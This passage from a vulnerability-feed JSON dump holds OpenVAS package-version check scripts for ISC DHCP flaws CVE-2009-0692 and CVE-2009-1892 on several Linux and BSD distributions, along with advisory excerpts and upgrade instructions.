\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_name(\"Fedora Update for dhcp FEDORA-2010-10083\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dhcp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.1.0p1~6.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:15", "description": "The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:172.", "cvss3": {}, "published": "2009-08-17T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:172 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064515", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064515", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_172.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:172 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in ISC DHCP:\n\nISC DHCP Server is vulnerable to a denial of service, caused by the\nimproper handling of DHCP requests. If the host definitions are mixed\nusing dhcp-client-identifier and hardware ethernet, a remote attacker\ncould send specially-crafted DHCP requests to cause the server to\nstop responding (CVE-2009-1892).\n\nThis update provides fixes for this vulnerability.\n\nAffected: Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:172\nhttp://xforce.iss.net/xforce/xfdb/51717\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:172.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64515\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-17 16:54:45 +0200 (Mon, 17 Aug 2009)\");\n script_cve_id(\"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:172 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~1.4mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:18:03", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-803-2", "cvss3": {}, "published": "2010-01-29T00:00:00", "type": "openvas", "title": "Ubuntu Update for dhcp3 vulnerability USN-803-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840379", "href": "http://plugins.openvas.org/nasl.php?oid=840379", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_803_2.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for dhcp3 vulnerability USN-803-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-803-1 fixed a vulnerability in Dhcp. Due to an error, the patch to\n fix the vulnerability was not properly applied on Ubuntu 8.10 and higher.\n Even with the patch improperly applied, the default compiler options\n reduced the vulnerability to a denial of service. Additionally, in Ubuntu\n 9.04 and higher, users were also protected by the AppArmor dhclient3\n profile. This update fixes the problem.\n\n Original advisory details:\n \n It was discovered that the DHCP client as included in dhcp3 did not verify\n the length of certain option fields when processing a response from an IPv4\n dhcp server. If a user running Ubuntu 6.06 LTS or 8.04 LTS connected to a\n malicious dhcp server, a remote attacker could cause a denial of service or\n execute arbitrary code as the user invoking the program, typically the\n 'dhcp' user. For users running Ubuntu 8.10 or 9.04, a remote attacker\n should only be able to cause a denial of service in the DHCP client. In\n Ubuntu 9.04, attackers would also be isolated by the AppArmor dhclient3\n profile.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-803-2\";\ntag_affected = \"dhcp3 vulnerability on Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-803-2/\");\n script_id(840379);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-29 14:09:25 +0100 (Fri, 29 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"803-2\");\n script_cve_id(\"CVE-2009-0692\");\n script_name(\"Ubuntu Update for dhcp3 vulnerability USN-803-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp-client\", ver:\"3.1.2-1ubuntu7.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp-client\", ver:\"3.1.1-5ubuntu8.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-1ubuntu2.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:01", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "FreeBSD Ports: isc-dhcp31-client", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2016-12-23T00:00:00", "id": "OPENVAS:64447", "href": "http://plugins.openvas.org/nasl.php?oid=64447", "sourceData": "#\n#VID c444c8b7-7169-11de-9ab7-000c29a67389\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID c444c8b7-7169-11de-9ab7-000c29a67389\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n isc-dhcp31-client\n isc-dhcp30-client\n\nCVE-2009-0692\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before\n4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers\nto execute arbitrary code via a crafted subnet-mask option.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttps://www.isc.org/node/468\nhttp://secunia.com/advisories/35785\nhttp://www.kb.cert.org/vuls/id/410676\nhttp://www.vuxml.org/freebsd/c444c8b7-7169-11de-9ab7-000c29a67389.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(64447);\n script_version(\"$Revision: 4847 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-23 10:33:16 +0100 (Fri, 23 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: isc-dhcp31-client\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"isc-dhcp31-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.1.1\")<=0) {\n txt += 'Package isc-dhcp31-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"isc-dhcp30-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.0.7\")<=0) {\n txt += 'Package isc-dhcp30-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:56", "description": "The remote host is missing updates announced in\nadvisory GLSA 200908-08.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200908-08 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64765", "href": "http://plugins.openvas.org/nasl.php?oid=64765", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"dhcpd as included in the ISC DHCP implementation does not properly handle\n special conditions, leading to a Denial of Service.\";\ntag_solution = \"All ISC DHCP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose =net-misc/dhcp-3.1.2_p1\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200908-08\nhttp://bugs.gentoo.org/show_bug.cgi?id=275231\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200908-08.\";\n\n \n \n\nif(description)\n{\n script_id(64765);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200908-08 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/dhcp\", unaffected: make_list(\"ge 3.1.2_p1\"), vulnerable: make_list(\"lt 3.1.2_p1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:46", "description": "The remote host is missing updates announced in\nadvisory GLSA 200908-08.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200908-08 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064765", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064765", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"dhcpd as included in the ISC DHCP implementation does not properly handle\n special conditions, leading to a Denial of Service.\";\ntag_solution = \"All ISC DHCP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose =net-misc/dhcp-3.1.2_p1\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200908-08\nhttp://bugs.gentoo.org/show_bug.cgi?id=275231\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200908-08.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64765\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200908-08 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/dhcp\", unaffected: make_list(\"ge 3.1.2_p1\"), vulnerable: make_list(\"lt 3.1.2_p1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:56:21", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp-client\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-11T00:00:00", "type": "openvas", "title": "SLES11: Security update for dhcp-client", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65690", "href": "http://plugins.openvas.org/nasl.php?oid=65690", "sourceData": "#\n#VID 8344cd148acb6a76268d2b1462cf9a03\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for dhcp-client\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp-client\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=515599\");\n script_id(65690);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES11: Security update for dhcp-client\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.1.1~7.13.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:50", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n 